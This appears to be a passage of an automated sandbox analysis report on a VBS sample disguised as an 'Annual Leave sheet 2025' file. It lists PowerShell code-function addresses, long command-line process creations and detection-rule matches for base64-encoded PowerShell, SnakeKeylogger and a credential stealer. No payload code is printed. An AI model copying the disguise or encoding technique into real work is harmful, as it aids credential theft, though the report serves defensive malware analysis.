                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F1B0F013_2_04F1B0F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F1B0D013_2_04F1B0D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728A6E013_2_0728A6E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728AD4813_2_0728AD48
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728945813_2_07289458
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728B3B013_2_0728B3B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728A07813_2_0728A078
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728C89013_2_0728C890
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728378813_2_07283788
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728379813_2_07283798
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728263813_2_07282638
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728263713_2_07282637
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728560013_2_07285600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287E7813_2_07287E78
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287E7713_2_07287E77
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282EE813_2_07282EE8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282EE713_2_07282EE7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728A6D013_2_0728A6D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728C52813_2_0728C528
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728C53813_2_0728C538
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728AD3813_2_0728AD38
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07286D1813_2_07286D18
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07286D1313_2_07286D13
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07284D4F13_2_07284D4F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07284D5013_2_07284D50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072875B913_2_072875B9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07281D8813_2_07281D88
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072855FF13_2_072855FF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072875C813_2_072875C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728646813_2_07286468
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728645A13_2_0728645A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728945713_2_07289457
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072844A013_2_072844A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728449F13_2_0728449F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728333B13_2_0728333B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728334013_2_07283340
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728B3A013_2_0728B3A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07285BB813_2_07285BB8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07285BB713_2_07285BB7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07283BEF13_2_07283BEF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07283BF013_2_07283BF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07281BF013_2_07281BF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287A2013_2_07287A20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07287A1113_2_07287A11
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728BA4813_2_0728BA48
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728BA4713_2_0728BA47
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282A8F13_2_07282A8F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07282A9013_2_07282A90
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072882C113_2_072882C1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072882D013_2_072882D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728896813_2_07288968
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728716313_2_07287163
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728896713_2_07288967
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728717013_2_07287170
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072851A813_2_072851A8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728519A13_2_0728519A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072821E013_2_072821E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072821D013_2_072821D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728600F13_2_0728600F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728601013_2_07286010
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728A06813_2_0728A068
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728404813_2_07284048
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0728404113_2_07284041
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072868BA13_2_072868BA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072848EA13_2_072848EA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072848F813_2_072848F8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072868C013_2_072868C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072EF7C013_2_072EF7C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072EF7B213_2_072EF7B2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E054813_2_072E0548
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072ED54413_2_072ED544
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E055813_2_072E0558
                  Source: Annual Leave sheet 2025.vbsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 3380
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6019
                  Source: amsi32_1276.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi32_7628.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi32_8000.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi32_4696.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi32_7892.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi32_7044.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi32_7564.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi32_5044.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi32_5332.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 30.2.powershell.exe.a64805c.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 30.2.powershell.exe.a64805c.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 22.2.powershell.exe.a380b24.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 79.2.powershell.exe.a1538b4.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 79.2.powershell.exe.a1538b4.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 59.2.powershell.exe.a72a22c.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 59.2.powershell.exe.a72a22c.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
